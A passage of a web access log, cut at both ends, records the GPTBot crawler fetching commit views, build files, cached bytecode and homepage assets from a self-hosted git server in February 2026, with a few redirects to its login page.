2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:11:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:11:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:11:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 18498] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:17:11:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" +[17/Feb/2026:17:11:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:11:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:17:11:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:11:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:11:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:11:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:11:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:11:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10472] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:17:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:11:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 10907] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:17:11:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 10300] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets" +[17/Feb/2026:17:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 20320768] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" +[17/Feb/2026:17:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:17:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14251] [Gzip 8.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:17:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:17:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:17:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:17:12:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 15132] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/js" [Client 74.7.227.38] [Length 9840] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26520] [Gzip 6.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js" +[17/Feb/2026:17:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 2414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:17:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 2414] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:17:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12186] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr 